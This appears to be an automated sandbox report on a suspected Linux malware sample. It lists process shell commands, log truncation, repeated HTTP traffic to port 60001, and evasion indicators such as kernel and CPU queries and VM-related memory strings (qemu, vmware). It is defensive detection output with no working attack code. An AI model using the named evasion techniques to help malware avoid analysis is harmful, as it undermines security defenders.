Source: /usr/sbin/logrotate (PID: 5245) Shell command executed: sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslog Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5471) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5473) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5475) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5477) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5479) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5482) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5484) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5488) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/share/language-tools/language-options (PID: 5516) Shell command executed: sh -c "locale -a | grep -F .utf8 " Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5634) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5636) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5639) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5641) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5643) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5645) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5650) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5654) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/share/language-tools/language-options (PID: 5753) Shell command executed: sh -c "locale -a | grep -F .utf8 "
Source: /usr/bin/gpu-manager (PID: 5820) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5822) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5824) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5827) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5830) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5832) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5837) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5839) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5927) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5930) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5934) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5936) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5940) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5943) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5949) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5951) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/sbin/rsyslogd (PID: 5459) Log file created: /var/log/auth.log
Source: /usr/sbin/rsyslogd (PID: 5459) Log file created: /var/log/kern.log
Source: /usr/bin/gpu-manager (PID: 5470) Log file created: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5633) Log file created: /var/log/gpu-manager.log
Source: /usr/sbin/rsyslogd (PID: 5653) Log file created: /var/log/auth.log
Source: /usr/sbin/rsyslogd (PID: 5653) Log file created: /var/log/kern.log
Source: /usr/sbin/rsyslogd (PID: 5734) Log file created: /var/log/kern.log
Source: /usr/bin/gpu-manager (PID: 5762) Log file created: /var/log/gpu-manager.log
Source: /usr/sbin/rsyslogd (PID: 5843) Log file created: /var/log/auth.log
Source: /usr/sbin/rsyslogd (PID: 5843) Log file created: /var/log/kern.log
Source: /usr/sbin/rsyslogd (PID: 5917) Log file created: /var/log/kern.log
Source: /usr/sbin/rsyslogd (PID: 5917) Log file created: /var/log/auth.log
Source: /usr/bin/gpu-manager (PID: 5926) Log file created: /var/log/gpu-manager.log Jump to dropped file
Source: /usr/sbin/rsyslogd (PID: 6021) Log file created: /var/log/auth.log Jump to dropped file
Source: /usr/sbin/rsyslogd (PID: 6021) Log file created: /var/log/kern.log Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 35978 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35978 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35978 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 37668 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 37668 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35978 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 37668 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52794 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35978 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 50466 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52794 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52794 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52794 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52794 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35978 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52794 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35978 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52794 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39302 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53846 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39302 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53846 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39302 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53846 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39302 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43140 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43140 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53846 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43140 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43140 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53846 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43140 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43564 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 32850 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43564 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 32850 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 32850 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43564 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53846 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 32850 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33276 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43140 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 32850 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 37456 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 37456 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 37456 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 51214 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 51214 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 32850 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52794 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 51618 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43354 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 51618 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 51618 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35978 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 51618 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 56348 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35656 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 56348 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 56348 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53846 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43140 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 32850 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58528 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35206 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58528 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35206 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58528 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48776 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35206 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48776 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58528 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48776 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35206 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48776 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58528 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35206 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48776 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58528 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48776 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35206 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 32850 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53846 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43140 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58528 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48776 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35206 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58528 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48776 -> 60001

Malware Analysis System Evasion:

barindex
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pulseaudio (PID: 5386) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5492) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5661) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5842) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5948) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6019) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 6041) Reads CPU info from /sys: /sys/devices/system/cpu/online
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /usr/bin/find (PID: 5232) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5278) Queries kernel information via 'uname': Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5321) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/whoopsie (PID: 5383) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/pulseaudio (PID: 5386) Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/rsyslogd (PID: 5459) Queries kernel information via 'uname': Jump to behavior
Source: /sbin/agetty (PID: 5461) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5470) Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/gdm3/gdm-session-worker (PID: 5521) Queries kernel information via 'uname': Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5566) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/whoopsie (PID: 5567) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5633) Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/rsyslogd (PID: 5653) Queries kernel information via 'uname': Jump to behavior
Source: /sbin/agetty (PID: 5659) Queries kernel information via 'uname': Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5668) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/whoopsie (PID: 5669) Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/rsyslogd (PID: 5734) Queries kernel information via 'uname': Jump to behavior
Source: /sbin/agetty (PID: 5740) Queries kernel information via 'uname': Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5746) Queries kernel information via 'uname':
Source: /usr/bin/whoopsie (PID: 5750) Queries kernel information via 'uname':
Source: /usr/bin/gpu-manager (PID: 5762) Queries kernel information via 'uname':
Source: /usr/sbin/rsyslogd (PID: 5843) Queries kernel information via 'uname':
Source: /lib/systemd/systemd-journald (PID: 5850) Queries kernel information via 'uname':
Source: /usr/bin/whoopsie (PID: 5852) Queries kernel information via 'uname':
Source: /usr/sbin/rsyslogd (PID: 5917) Queries kernel information via 'uname':
Source: /sbin/agetty (PID: 5924) Queries kernel information via 'uname':
Source: /lib/systemd/systemd-journald (PID: 5925) Queries kernel information via 'uname':
Source: /usr/bin/gpu-manager (PID: 5926) Queries kernel information via 'uname':
Source: /usr/bin/whoopsie (PID: 5929) Queries kernel information via 'uname':
Source: /usr/bin/pulseaudio (PID: 5948) Queries kernel information via 'uname':
Source: /usr/sbin/rsyslogd (PID: 6021) Queries kernel information via 'uname':
Source: /sbin/agetty (PID: 6025) Queries kernel information via 'uname':
Source: /usr/bin/whoopsie (PID: 6029) Queries kernel information via 'uname':
Source: /lib/systemd/systemd-journald (PID: 6033) Queries kernel information via 'uname':
Source: /usr/bin/pulseaudio (PID: 6041) Queries kernel information via 'uname':
Deletes log files
Source: /usr/sbin/logrotate (PID: 5192) Truncated file: /var/log/cups/access_log.1 Jump to behavior
Source: /usr/sbin/logrotate (PID: 5192) Truncated file: /var/log/syslog.1 Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5470) Truncated file: /var/log/gpu-manager.log Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5633) Truncated file: /var/log/gpu-manager.log Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5746) Truncated file: /var/log/journal/ee49dfd4fa47433baee88884e2d7de7c/system@0005d593c8771680-635fa3b935fc1b52.journal~
Source: /usr/bin/gpu-manager (PID: 5762) Truncated file: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5926) Truncated file: /var/log/gpu-manager.log
Source: 5237.18.dr Binary or memory string: -9915837702310A--gzvmware kernel module
Source: 5237.18.dr Binary or memory string: -1116261022170A--gzQEMU User Emulator
Source: 5237.18.dr Binary or memory string: qemu-or1k
Source: 5237.18.dr Binary or memory string: qemu-riscv64
Source: 5237.18.dr Binary or memory string: {cqemu
Source: 5237.18.dr Binary or memory string: qemu-arm
Source: 5237.18.dr Binary or memory string: (qemu
Source: 5237.18.dr Binary or memory string: qemu-tilegx
Source: 5237.18.dr Binary or memory string: qemu-hppa
Source: 5237.18.dr Binary or memory string: q{rqemu%
Source: 5237.18.dr Binary or memory string: )qemu
Source: 5237.18.dr Binary or memory string: vmware-toolbox-cmd
Source: 5237.18.dr Binary or memory string: qemu-ppc
Source: 5237.18.dr Binary or memory string: Tqemu9
Source: nSg5RM0w0d, 5278.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5281.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5282.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5286.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5289.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5290.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5294.1.00000000e75c9218.00000000d9b03796.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/m68k
Source: nSg5RM0w0d, 5278.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5281.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5282.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5286.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5289.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5290.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5294.1.00000000e75c9218.00000000d9b03796.rw-.sdmp Binary or memory string: kaU!/etc/qemu-binfmt/m68k
Source: syslog.67.dr Binary or memory string: Jan 15 00:11:43 galassia kernel: [ 478.955182] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 12/12/2018
Source: 5237.18.dr Binary or memory string: qemu-aarch64_be
Source: 5237.18.dr Binary or memory string: 0qemu9
Source: 5237.18.dr Binary or memory string: qemu-sparc64
Source: 5237.18.dr Binary or memory string: qemu-mips64
Source: 5237.18.dr Binary or memory string: vV:qemu9
Source: 5237.18.dr Binary or memory string: qemu-ppc64le
Source: 5237.18.dr Binary or memory string: <glib::param::uint64Glib::Param::UInt643pm315820097650A--gzWrapper for uint64 parameters in GLibx86_64-linux-gnu-ld.gold-1116112426130B--gzThe GNU ELF linkerprinter-profile-1115804162510A--gzProfile using X-Rite ColorMunki and Argyll CMSgrub-fstest-1116214898500A--gzdebug tool for GRUB filesystem driversxdg-user-dir-1115483406210A--gzFind an XDG user dirkmodsign-1115569251480A--gzKernel module signing toolsensible-editor-1115739932820A--gzsensible editing, paging, and web browsingminesMines6615854478170Cgnome-mines-gzinputattach-1115708189280A--gzattach a serial line to an input-layer devicegapplication-1116155671180A--gzD-Bus application launcherip-tunnel-8815816145190A--gztunnel configurationkoi8rxterm-1116140167530A--gzX terminal emulator for KOI8-R environmentsfoo2hiperc-wrapper-1115804162510A-tgzConvert Postscript into a HIPERC printer streamcryptsetup-reencrypt-8816002888050A--gztool for offline LUKS device re-encryptionsyndaemon-1115861716810A--gza program that monitors keyboard activity and disables the touchpad when the keyboard is being used.gslj-1115980290200B--gzFormat and print text for LaserJet printer using ghostscriptfile2brl-1115757179490A--gzTranslate an xml or a text file into an embosser-ready braille filexfdesktop-settings-1115793419820A--gzDesktop settings for Xfceua-1115856013570B--gzManage Ubuntu Advantage services from Canonicallatin4-7715812813670B--gzISO 8859-4 character set encoded in octal, decimal, and hexadecimalsane-genesys-5516003468200A--gzSANE backend for GL646, GL841, GL843, GL847 and GL124 based USB flatbed scannerspdftohtml-1115853266670A--gzprogram to convert PDF files into HTML, XML and PNG imagesbluetooth-sendto-1116015653360A--gzGTK application for transferring files over Bluetoothqemu-ppc64-1116261022170B--gzQEMU User Emulatorcache_metadata_size-8815811608350A--gzEstimate the size of the metadata device needed for a given configuration.net::dbus::exporterNet::DBus::Exporter3pm315773746310A--gzExport object methods and signals to the bussane-pint-5516003468200A--gzSANE backend for scanners that use the PINT device driverbpf-helpers7-7715812813670A--gzlist of eBPF helper functionsfull-4415812813670A--gzalways full devicelogin-1115906478670A--gzbegin session on the systemcups-snmp-8815877390340A--gzcups snmp backend (deprecated)ordchr-3am315728089600A--gzconvert characters to strings and vice versasosreport-1116092694050A--gzCollect and package diagnostic and support datatop-1115827827270A--gzdisplay Linux processesuri::_punycodeURI::_punycode3pm315811897880A--gzencodes Unicode string in Punycodettytty4tty1systemd-localed-8816268940210B--gzLocale bus mechanismlvmsadc-8815816289110
Source: 5237.18.dr Binary or memory string: vmware
Source: 5237.18.dr Binary or memory string: qemu-cris
Source: 5237.18.dr Binary or memory string: libvmtools
Source: 5237.18.dr Binary or memory string: qemu-m68k
Source: 5237.18.dr Binary or memory string: qemu-xtensa
Source: 5237.18.dr Binary or memory string: 9qemu
Source: 5237.18.dr Binary or memory string: qemu-sh4
Source: 5237.18.dr Binary or memory string: Dprezip-bin-1116269780060A--gzprefix zip delta word list compressor/decompressornameif-8815490444730A--gzname network interfaces based on MAC addressesxdg-user-dirs-update-1115483406210A--gzUpdate XDG user dir configurationip-link-8815816145190A--gznetwork device configurationhpsa-4415812813670A--gzHP Smart Array SCSI driverhd4-4415812813670A--gzMFM/IDE hard disk devicessane-canon630u-5516003468200A--gzSANE backend for the Canon 630u USB flatbed scannersg_copy_results-8815825816070A--gzsend SCSI RECEIVE COPY RESULTS command (XCOPY related)grub-macbless-8816214898500A--gzbless a mac file/directoryntfstruncate-8815568625640A-tgztruncate a file on an NTFS volumelessfile-1115936459130B--gz"input preprocessor" for less.sane-artec-5516003468200A--gzSANE backend for Artec flatbed scannersrmdir-1115676799200A--gzremove empty directoriessystemd-networkd-wait-online.service-8816268940210A--gzWait for network to come onlinemkfs.ntfs-8815568625640B-tgzcreate an NTFS file systemsg_inq-8815825816070A--gzissue SCSI INQUIRY command and/or decode its responseradattr.so-8815955079440Cpppd-radattr-gzc_rehash-1ssl116164130370B--gzCreate symbolic links to files named by the hash valuestc-htb-8815816145190A--gzHierarchy Token Bucketgvfs-open-1115868766090A--gzsg_rbuf-8815825816070A--gzreads data using SCSI READ BUFFER commandglib-compile-schemas-1116155671180A--gzGSettings schema compileropenssl-srp-1ssl116164130370B--gzmaintain SRP password fileopenssl-rehash-1ssl116164130370B--gzCreate symbolic links to files named by the hash valueslibvmtools-3315837702310A--gzvmware shared librarypasswd5-5515906478670A--gzthe password filenet::dbus::dumperNet::DBus::Dumper3pm315773746310A--gzStringify Net::DBus objects suitable for printingsane-hp4200-5516003468200A--gzSANE backend for Hewlett-Packard 4200 scannersposixoptions-7715812813670A--gzoptional parts of the POSIX standardnetworkmanager.confNetworkManager.conf5516002723180A--gzNetworkManager configuration fileownership-8815771238010A--gzCompaq ownership tag retrieveroakdecode-1115804162510A--gzDecode an OAKT printer stream into human readable form.gvfs-save-1115868766090A--gzmkfs.minix-8815953177680A--gzmake a Minix filesystemuri7-7715812813670A--gzuniform resource identifier (URI), including a URL or URNedit-1115714399500B--gzexecute programs via entries in the mailcap filegit-diff-files-1116148628880A--gzCompares files in the working tree and the index.ldaprc-5516136581350Cldap.conf-gzpactl-1116219586470A--gzControl a running PulseAudio sound servertempfile-1115756848240A--gzcreate a temporary file in a safe mannerhp-check-1115857238880A--gzDependency/Vers
Source: nSg5RM0w0d, 5278.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5281.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5282.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5286.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5289.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5290.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5294.1.000000001e4697c8.0000000045731922.rw-.sdmp Binary or memory string: /usr/bin/qemu-m68k
Source: 5237.18.dr Binary or memory string: .qemu{
Source: 5237.18.dr Binary or memory string: qemu-ppc64abi32
Source: 5237.18.dr Binary or memory string: qemu-ppc64
Source: 5237.18.dr Binary or memory string: qemu-i386
Source: 5237.18.dr Binary or memory string: qemu-x86_64
Source: 5237.18.dr Binary or memory string: H~6\nqemu*q
Source: 5237.18.dr Binary or memory string: @qemu
Source: 5237.18.dr Binary or memory string: Fqqemu
Source: 5237.18.dr Binary or memory string: N4qemu
Source: 5237.18.dr Binary or memory string: ~6\nqemu*q
Source: 5237.18.dr Binary or memory string: qemu-mips64el
Source: 5237.18.dr Binary or memory string: hqemu
Source: 5237.18.dr Binary or memory string: &mqemu
Source: 5237.18.dr Binary or memory string: $qemu
Source: 5237.18.dr Binary or memory string: qemu-sparc
Source: 5237.18.dr Binary or memory string: qemu-microblaze
Source: 5237.18.dr Binary or memory string: qemu-user
Source: 5237.18.dr Binary or memory string: qemu-aarch64
Source: 5237.18.dr Binary or memory string: qemu-sh4eb
Source: 5237.18.dr Binary or memory string: iqemu
Source: 5237.18.dr Binary or memory string: qemu-mipsel
Source: 5237.18.dr Binary or memory string: qemuP`
Source: 5237.18.dr Binary or memory string: qemu-alpha
Source: 5237.18.dr Binary or memory string: qemu-microblazeel
Source: 5237.18.dr Binary or memory string: \qemu
Source: 5237.18.dr Binary or memory string: qemu-xtensaeb
Source: 5237.18.dr Binary or memory string: qemu-mipsn32el
Source: 5237.18.dr Binary or memory string: SAqemu
Source: 5237.18.dr Binary or memory string: Vqemu
Source: 5237.18.dr Binary or memory string: qemu-mipsn32
Source: syslog.67.dr Binary or memory string: Jan 15 00:11:43 galassia kernel: [ 478.955119] Modules linked in: monitor(OE) md4 cmac cifs libarc4 fscache libdes vmw_vsock_vmci_transport vsock binfmt_misc dm_multipath scsi_dh_rdac scsi_dh_emc scsi_dh_alua vmw_balloon joydev input_leds serio_raw vmw_vmci sch_fq_codel drm parport_pc ppdev lp parport ip_tables x_tables autofs4 btrfs zstd_compress raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel crypto_simd cryptd glue_helper psmouse ahci mptspi vmxnet3 scsi_transport_spi mptscsih libahci mptbase
Source: 5237.18.dr Binary or memory string: qemuAU
Source: 5237.18.dr Binary or memory string: qemu-riscv32
Source: 5237.18.dr Binary or memory string: qemu-sparc32plus
Source: 5237.18.dr Binary or memory string: 7,qemu
Source: 5237.18.dr Binary or memory string: qemu-s390x
Source: 5237.18.dr Binary or memory string: vmware-checkvm
Source: 5237.18.dr Binary or memory string: qemu-nios2
Source: 5237.18.dr Binary or memory string: qemu-armeb
Source: 5237.18.dr Binary or memory string: -4415868968400A--gzVMware SVGA video driver
